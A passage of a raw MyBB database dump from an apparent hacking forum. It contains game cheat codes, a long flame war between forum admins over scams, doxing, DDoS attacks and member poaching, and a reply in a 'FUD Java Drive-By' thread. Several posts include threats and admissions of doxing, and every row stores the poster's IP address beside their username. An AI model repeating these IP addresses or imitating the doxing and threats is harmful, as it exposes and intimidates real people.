L2, R2. If you entered the code correctly, a message will appear. You can now get money from prostitutes instead of paying them.\r\n\r\n[b]Taxi missions completed[/b]\r\nWhile playing the game, press Up, Left(2), Down, Circle, Square, L1(2), L2, R1, R2. If you entered the code correctly, a message will appear. All taxis will now have nitrous.\r\n\r\n[b]Raise wanted level[/b]\r\nWhile playing the game, press R1(2), Circle, R2, Left, Right, Left, Right, Left, Right. If you entered the code correctly, a message will appear.\r\n\r\n[b]Six star wanted level[/b]\r\nWhile playing the game, press Circle, Right, Circle, Right, Left, Square, X, Down. If you entered the code correctly, a message will appear.\r\n\r\n[b]Lower wanted level[/b]\r\nWhile playing the game, press R1(2), Circle, R2, Up, Down, Up, Down, Up, Down. If you entered the code correctly, a message will appear.\r\n\r\n[b]Wanted level never increases[/b]\r\nWhile playing the game, press Circle, Right, Circle, Right, Left, Square, Triangle, Up. If you entered the code correctly, a message will appear. Note: This will not remove any wanted level stars you may already have.\r\n\r\n[b]Bounty on your head[/b]\r\nWhile playing the game, press Down, Up(2), Up, X, R2, R1, L2(2). If you entered the code correctly, a message will appear. Repeat this code to disable its effect.\r\n\r\n[b]Maximum vehicle skills[/b]\r\nWhile playing the game, press Square, L2, X, R1, L2(2), Left, R1, Right, L1(3). If you entered the code correctly, a message will appear.\r\n\r\n[b]Maximum respect[/b]\r\nWhile playing the game, press L1, R1, Triangle, Down, R2, X, L1, Up, L2(2), L1(2). If you entered the code correctly, a message will appear. Note: When starting a new game or when you have a very low respect level, enable the \"Maximum respect\" code twice and your total respect level will be green.\r\n\r\n[b]Maximum sex appeal[/b]\r\nWhile playing the game, press Circle, Triangle(2), Up, Circle, R1, L2, Up, Triangle, L1(3). If you entered the code correctly, a message will appear.\r\n\r\n[b]Maximum lung capacity[/b]\r\nWhile playing the game, press Down, Left, L1, Down(2), R2, Down, L2, Down. If you entered the code correctly, a message will appear.\r\n\r\n[b]Maximum muscle[/b]\r\nWhile playing the game, press Triangle, Up(2), Left, Right, Square, Circle, Left. If you entered the code correctly, a message will appear. Note: You will not be able to workout at any of the gyms.\r\n\r\n[b]Maximum fat[/b]\r\nWhile playing the game, press Triangle, Up(2), Left, Right, Square, Circle, Down. If you entered the code correctly, a message will appear. Note: This will reduce the muscle stat to zero.\r\n\r\n[b]No fat or muscle[/b]\r\nWhile playing the game, press Triangle, Up(2), Left, Right, Square, Circle, Right. If you entered the code correctly, a message will appear.\r\n\r\n[b]No hunger[/b]\r\nWhile playing the game, press Square, L2, R1, Triangle, Up, Square, L2, Up, X. If you entered the code correctly, a message will appear.\r\n\r\n[b]Super punches[/b]\r\nWhile playing the game, press Up, Left, X, Triangle, R1, Circle(3), L2. If you entered the code correctly, a message will appear. Punch pedestrians to send them flying further away; however, they can also super punch. Repeat this code to disable its effect.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9ef35ff90e588fdf8e6ac0f0e3df91f2', '0', '0'); INSERT INTO mybb_posts VALUES('3998', '747', '3996', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349752479', '[quote=\'Anarchy Forums\' pid=\'3996\' dateline=\'1349751953\']\r\n[quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\']\r\n[quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\']\r\nJust because I suggested it, doesn\'t mean I used it. \r\n\r\n+ Why the fuck would you post that dox of me online?\r\n[/quote]\r\n\r\nI created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. \r\n\r\nI have Anarchists\' original and VPN IP so you can check it out.\r\n[/quote]\r\n\r\nMy IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language.\r\nThe fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport.\r\n\r\nHowever, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader.\r\n[/quote]\r\n\r\nIght lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum?\r\n\r\nNow if you got scammed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything.\r\n\r\nYou revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6808edcdf350505c35f342b2e7d88df5', '0', '0'); INSERT INTO mybb_posts VALUES('3999', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349753135', '[quote=\'t3h jok3r\' pid=\'3998\' dateline=\'1349752479\']\r\n[quote=\'[Anarchy Sucks] Forums\' pid=\'3996\' dateline=\'1349751953\']\r\n[quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\']\r\n[quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\']\r\nJust because I suggested it, doesn\'t mean I used it. \r\n\r\n+ Why the fuck would you post that dox of me online?\r\n[/quote]\r\n\r\nI created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. \r\n\r\nI have Anarchists\' original and VPN IP so you can check it out.\r\n[/quote]\r\n\r\nMy IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language.\r\nThe fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport.\r\n\r\nHowever, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader.\r\n[/quote]\r\n\r\nIght lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum?\r\n\r\nNow if you got sca-mmed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything.\r\n\r\nYou revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have.\r\n[/quote]\r\n\r\nI never made an agreement not to disclose your private messages, sorry if you were mistaken. \r\nYou shouldn\'t make threats or statements that you aren\'t comfortable with being made public.\r\n\r\nAs far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. \r\nI won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you.\r\n\r\nIf you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? \r\nExplain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader.\r\n\r\nAs far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions.', '108.171.103.234', '1823172586', '0', '0', '246', '1349753180', '1', '93cc0181b336a26ddc9538718c4c783b', '0', '1349753180'); INSERT INTO mybb_posts VALUES('4000', '747', '3996', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '61', 'NXK', '1349753175', '[quote=\'The Anarchist\' pid=\'3996\' dateline=\'1349751953\']\r\n[quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\']\r\n[quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\']\r\nJust because I suggested it, doesn\'t mean I used it. \r\n\r\n+ Why the fuck would you post that dox of me online?\r\n[/quote]\r\n\r\nI created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. \r\n\r\nI have Anarchists\' original and VPN IP so you can check it out.\r\n[/quote]\r\n\r\nMy IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language.\r\nThe fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport.\r\n\r\nHowever, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader.\r\n\r\n[quote=\'??????????¢™\' pid=\'3961\' dateline=\'1349734471\']\r\n[Anarchys] is a fucking skid. Trying to steal members from the best forum so that your shitty forum could become hq and active like LH. GTFO Skid.\r\n[/quote]\r\n\r\nActually, I had nothing to do with the private messages sent out. Someone else had sent those.\r\nIronically, your site\'s members were the first to spam, as several of our users claimed to have received spam messages from your site.\r\n[/quote]\r\n\r\nIf you didn\'t care about your IP why are you still on a VPN?', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '8e99371bfc0fb6f540695038c7be61d5', '0', '0'); INSERT INTO mybb_posts VALUES('4001', '747', '4000', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349753270', '[quote=\'NXK\' pid=\'4000\' dateline=\'1349753175\']\n[quote=\'The Anarchist\' pid=\'3996\' dateline=\'1349751953\']\n[quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\']\n[quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\']\nJust because I suggested it, doesn\'t mean I used it. \n\n+ Why the fuck would you post that dox of me online?\n[/quote]\n\nI created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. \n\nI have Anarchists\' original and VPN IP so you can check it out.\n[/quote]\n\nMy IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language.\nThe fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport.\n\nHowever, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader.\n\n[quote=\'??????????¢™\' pid=\'3961\' dateline=\'1349734471\']\n[Anarchys] is a fucking skid. Trying to steal members from the best forum so that your shitty forum could become hq and active like LH. GTFO Skid.\n[/quote]\n\nActually, I had nothing to do with the private messages sent out. Someone else had sent those.\nIronically, your site\'s members were the first to spam, as several of our users claimed to have received spam messages from your site.\n[/quote]\n\nIf you didn\'t care about your IP why are you still on a VPN?\n[/quote]\n\nMy location is blocked on several websites.\nLet me rephrase that. I care about my IP address, I just don\'t care if you guys have it. :cool:\n\nMy reasoning? Only a pre-teen makes jokes about another person\'s mother. I don\'t mind if he has my IP, as there is nothing he\'d be able to do with it.', '108.171.103.234', '1823172586', '0', '0', '246', '1349753457', '1', '5dd5f5cbfec8e3cc5b2a0ca583028383', '0', '1349753457'); INSERT INTO mybb_posts VALUES('4002', '747', '3999', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349753495', '[quote=\'The Anarchist\' pid=\'3999\' dateline=\'1349753135\']\n[quote=\'t3h jok3r\' pid=\'3998\' dateline=\'1349752479\']\n[quote=\'[[A. Forums] Sucks] Forums\' pid=\'3996\' dateline=\'1349751953\']\n[quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\']\n[quote=\'iTzIpod\' pid=\'3975\' dateline=\'1349736483\']\nJust because I suggested it, doesn\'t mean I used it. \n\n+ Why the fuck would you post that dox of me online?\n[/quote]\n\nI created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. \n\nI have Anarchists\' original and VPN IP so you can check it out.\n[/quote]\n\nMy IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language.\nThe fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport.\n\nHowever, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader.\n[/quote]\n\nIght lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum?\n\nNow if you got sca-mmed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything.\n\nYou revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have.\n[/quote]\n\nI never made an agreement not to disclose your private messages, sorry if you were mistaken. \nYou shouldn\'t make threats or statements that you aren\'t comfortable with being made public.\n\nAs far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. \nI won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you.\n\nIf you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? \nExplain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader.\n\nAs far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions.\n[/quote]\n\nOh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you?\n\nI did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame.\n\nIf you don\'t like me or my forum then leave.\n\nActually I can do anything with your IP because Brazil is not a hard country to SE.', '72.231.24.165', '1223104677', '1', '0', '1', '1349753560', '1', 'e60ac5bb79f34a3b3cc4e47d713741bb', '0', '1349753560'); INSERT INTO mybb_posts VALUES('4003', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '1', 't3h jok3r', '1349753617', 'I didn\'t even know you run a website. What software did you use?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b5e3563aa96142b2c57b9ba185d50c78', '0', '0'); INSERT INTO mybb_posts VALUES('4004', '713', '3640', '12', 'RE: How To Make A FUD Java Drive-By', '0', '61', 'NXK', '1349753683', 'This might come in handy sometime, Thanks for this.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'd19873d09ab98923bd806ff0a7012f6a', '0', '0'); INSERT INTO mybb_posts VALUES('4005', '747', '4002', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349753806', '[quote=\'t3h jok3r\' pid=\'4002\' dateline=\'1349753495\']\n[quote=\'The Anarchist\' pid=\'3999\' dateline=\'1349753135\']\n[quote=\'t3h jok3r\' pid=\'3998\' dateline=\'1349752479\']\n[quote=\'[[A. Forums] Sucks] Forums\' pid=\'3996\' dateline=\'1349751953\']\n[quote=\'t3h jok3r\' pid=\'3990\' dateline=\'1349745877\']\n\nI created 50% of it, the other 50% was created by someone else and posted by a third party which had the full DOX. So I did not post the DOX believe it or not, it\'s your mind so you decide who to trust OR you can ask Pastebin if you can get the paste posters IP. \n\nI have Anarchists\' original and VPN IP so you can check it out.\n[/quote]\n\nMy IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language.\nThe fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport.\n\nHowever, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader.\n[/quote]\n\nIght lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum?\n\nNow if you got sca-mmed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything.\n\nYou revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have.\n[/quote]\n\nI never made an agreement not to disclose your private messages, sorry if you were mistaken. \nYou shouldn\'t make threats or statements that you aren\'t comfortable with being made public.\n\nAs far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. \nI won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you.\n\nIf you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? \nExplain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader.\n\nAs far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions.\n[/quote]\n\nOh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you?\n\nI did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame.\n\nIf you don\'t like me or my forum then leave.\n\nActually I can do anything with your IP because Brazil is not a hard country to SE.\n[/quote]\n\nApparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it.\n\nWhy are you being so honest now? Not too long ago you said you had nothing to do with it. \nIn fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it.\n\nWhy bother lying if you can\'t keep your story straight?\nThis thread is about you, and your terrible qualities as a leader, not my site.\n\nAs far as contacting my ISP, are you honestly that invested in doing something to me?\nIronically enough, I have other means of internet, and you would have to learn an entire language to contact them (or risk looking like an idiot with a translator).\n\n(Also, our top poster does NOT have 3 posts)', '108.171.103.234', '1823172586', '0', '0', '246', '1349753934', '1', 'ac3a890fbbfaf37a2e55a6af01cf668d', '0', '1349753934'); INSERT INTO mybb_posts VALUES('4006', '747', '4005', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349754068', '[quote=\'The Anarchist\' pid=\'4005\' dateline=\'1349753806\']\r\n[quote=\'t3h jok3r\' pid=\'4002\' dateline=\'1349753495\']\r\n[quote=\'The Anarchist\' pid=\'3999\' dateline=\'1349753135\']\r\n[quote=\'t3h jok3r\' pid=\'3998\' dateline=\'1349752479\']\r\n[quote=\'[[A. Forums] Sucks] Forums\' pid=\'3996\' dateline=\'1349751953\']\r\n\r\nMy IP means nothing and neither would a DOX on me. I am 90% sure my ISP would tell you to fuck off, if you even managed to speak their language.\r\nThe fact you\'ve gone as low as DOXing your own members is pathetic. I spoke to Ipod in a very reasonable fashion and he claims that you DOXed him. I don\'t engage in such petty sport.\r\n\r\nHowever, you\'ve sca-mmed people, DOXed your own users, and you filter messages with strong criticism. You\'re a terrible leader.\r\n[/quote]\r\n\r\nIght lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum?\r\n\r\nNow if you got sca-mmed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything.\r\n\r\nYou revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have.\r\n[/quote]\r\n\r\nI never made an agreement not to disclose your private messages, sorry if you were mistaken. \r\nYou shouldn\'t make threats or statements that you aren\'t comfortable with being made public.\r\n\r\nAs far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. \r\nI won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you.\r\n\r\nIf you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? \r\nExplain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader.\r\n\r\nAs far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions.\r\n[/quote]\r\n\r\nOh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you?\r\n\r\nI did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame.\r\n\r\nIf you don\'t like me or my forum then leave.\r\n\r\nActually I can do anything with your IP because Brazil is not a hard country to SE.\r\n[/quote]\r\n\r\nApparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it.\r\n\r\nWhy are you being so honest now? Not too long ago you said you had nothing to do with it. \r\nIn fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it.\r\n\r\nWhy bother lying if you can\'t keep your story straight?\r\nThis thread is about you, and your terrible qualities as a leader, not my site.\r\n\r\n(Also, our top poster does NOT have 3 posts)\r\n[/quote]\r\n\r\nWrong this is a thread about you lying, your childish acts and who was behind our site going down.\r\n\r\nTodays most posts by Hardz was 3 and that thing came up in \"Todays Top Posters\" .\r\n\r\nI told Ipod straight that I had DOXed him and last time I checked he is a member of your site. All my members know who I am and they can trust me. iTzIpod can never stay on a website, ask the owner of theprofiters of who I am and who is Ipod.\r\n\r\nBitches had their DB exploited for stealing my members and Ipod left TP because he never stays on a site for long.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '73cf7b1bebc4eac14c2eee2daa8e090f', '0', '0'); INSERT INTO mybb_posts VALUES('4007', '747', '4006', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '246', 'The Anarchist', '1349754314', '[quote=\'t3h jok3r\' pid=\'4006\' dateline=\'1349754068\']\n[quote=\'The Anarchist\' pid=\'4005\' dateline=\'1349753806\']\n[quote=\'t3h jok3r\' pid=\'4002\' dateline=\'1349753495\']\n[quote=\'The Anarchist\' pid=\'3999\' dateline=\'1349753135\']\n[quote=\'t3h jok3r\' pid=\'3998\' dateline=\'1349752479\']\n\nIght lets say for A MOMENT admit that I\'m a terrible leader. Firstly, I\'m running a country I\'m running a website. Secondly, if I\'m a terrible Admin then what are you doing by creating 2-3 fake accounts everday and spamming my website? Cleaning up your m**s cum?\n\nNow if you got sca-mmed whatever today was a new day but you carried on crying like a baby and decided to spam my website. I didn\'t do anything yet to your site even though I could have and I didn\'t do it because I\'m more mature than you and think before doing anything. If it was your members creating fake accounts and not your fault then I will let my members do anything to your site and I won\'t be responsible for anything.\n\nYou revealed my private conversation on your site which proves you don\'t respect privacy and your site won\'t last long. Your site is nothing compared to mine, even if my site is on 1K threads and your site is on 100K threads my website would still be the best because I have shit that you don\'t have.\n[/quote]\n\nI never made an agreement not to disclose your private messages, sorry if you were mistaken. \nYou shouldn\'t make threats or statements that you aren\'t comfortable with being made public.\n\nAs far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. \nI won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you.\n\nIf you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? \nExplain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader.\n\nAs far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions.\n[/quote]\n\nOh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you?\n\nI did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame.\n\nIf you don\'t like me or my forum then leave.\n\nActually I can do anything with your IP because Brazil is not a hard country to SE.\n[/quote]\n\nApparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it.\n\nWhy are you being so honest now? Not too long ago you said you had nothing to do with it. \nIn fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it.\n\nWhy bother lying if you can\'t keep your story straight?\nThis thread is about you, and your terrible qualities as a leader, not my site.\n\n(Also, our top poster does NOT have 3 posts)\n[/quote]\n\nWrong this is a thread about you lying, your childish acts and who was behind our site going down.\n\nTodays most posts by Hardz was 3 and that thing came up in \"Todays Top Posters\" .\n\nI told Ipod straight that I had DOXed him and last time I checked he is a member of your site. All my members know who I am and they can trust me. iTzIpod can never stay on a website, ask the owner of theprofiters of who I am and who is Ipod.\n\nBitches had their DB exploited for stealing my members and Ipod left TP because he never stays on a site for long.\n[/quote]\n\nI would be surprised if you even knew what a database was.\nIronically, I failed to mention that the information in the DOX you made was also completely inaccurate.\n\nIpod confirmed that the DOX was worthless, and he didn\'t seem too worried.\nHowever, I had nothing to do with the site going down, as I have said. I can keep my story straight.\n\nI haven\'t lied to anybody, however, you have lied to plenty of people.', '108.171.103.234', '1823172586', '0', '0', '1', '1349754415', '1', '1eccb6dd1b98d04917e176181bde43f1', '0', '1349754415'); INSERT INTO mybb_posts VALUES('4008', '747', '4007', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349754505', '[quote=\'The Anarchist\' pid=\'4007\' dateline=\'1349754314\']\n[quote=\'t3h jok3r\' pid=\'4006\' dateline=\'1349754068\']\n[quote=\'The Anarchist\' pid=\'4005\' dateline=\'1349753806\']\n[quote=\'t3h jok3r\' pid=\'4002\' dateline=\'1349753495\']\n[quote=\'The Anarchist\' pid=\'3999\' dateline=\'1349753135\']\n\nI never made an agreement not to disclose your private messages, sorry if you were mistaken. \nYou shouldn\'t make threats or statements that you aren\'t comfortable with being made public.\n\nAs far as sca-mming? Yeah - it\'s a new day, but I would like your members to be aware of the fact their owner is a sca-mmer, and someone that DOXes their own users. \nI won\'t even bother arguing whose site is better, because a site is only as strong as it\'s weakest member. This site\'s weakest member is you.\n\nIf you\'d like to discuss respect, explain why you made the decision of showing me disrespect by sca-mming me? \nExplain to your users why you DOXed someone who had been devoted to your site. If you can\'t even admit you fucked up, then you aren\'t a very good leader.\n\nAs far as me making new accounts? I don\'t mind if it gives you a false sense of activity on your site. Everybody can see that this account will be banned and that it hadn\'t made any contributions.\n[/quote]\n\nOh no not at all. I will allow to create as much accounts you want to because from most of the accounts you are posting which helps increase my forums activity and when it comes to accounts I keep merging it into one account so I\'m not losing anything actually gaining so why stop you?\n\nI did it because you or one of your member DDoSed my website. I created a 50% DOX of a member that YOU stole. A member who is now your loyal member. I lost iTzIpod and his friendship but I was never emotionally attached so I don\'t mind if he leaves or not. You are doing exactly what he did on my forum, you are going to use him to get more activity but a website is only successful by active members willing to contribute. You have around 300 posts and only around 10 come online daily and your top poster of the day has 3 posts? What a shame.\n\nIf you don\'t like me or my forum then leave.\n\nActually I can do anything with your IP because Brazil is not a hard country to SE.\n[/quote]\n\nApparently you\'re sourly mistaken on what this thread is about. This thread is about how you sca-mmed me, DOXed a member on your own forum, and lied about it.\n\nWhy are you being so honest now? Not too long ago you said you had nothing to do with it. \nIn fact, you were telling everybody that I had DOXed Ipod. When I spoke to Ipod, he explained that you did it.\n\nWhy bother lying if you can\'t keep your story straight?\nThis thread is about you, and your terrible qualities as a leader, not my site.\n\n(Also, our top poster does NOT have 3 posts)\n[/quote]\n\nWrong this is a thread about you lying, your childish acts and who was behind our site going down.\n\nTodays most posts by Hardz was 3 and that thing came up in \"Todays Top Posters\" .\n\nI told Ipod straight that I had DOXed him and last time I checked he is a member of your site. All my members know who I am and they can trust me. iTzIpod can never stay on a website, ask the owner of theprofiters of who I am and who is Ipod.\n\nBitches had their DB exploited for stealing my members and Ipod left TP because he never stays on a site for long.\n[/quote]\n\nI would be 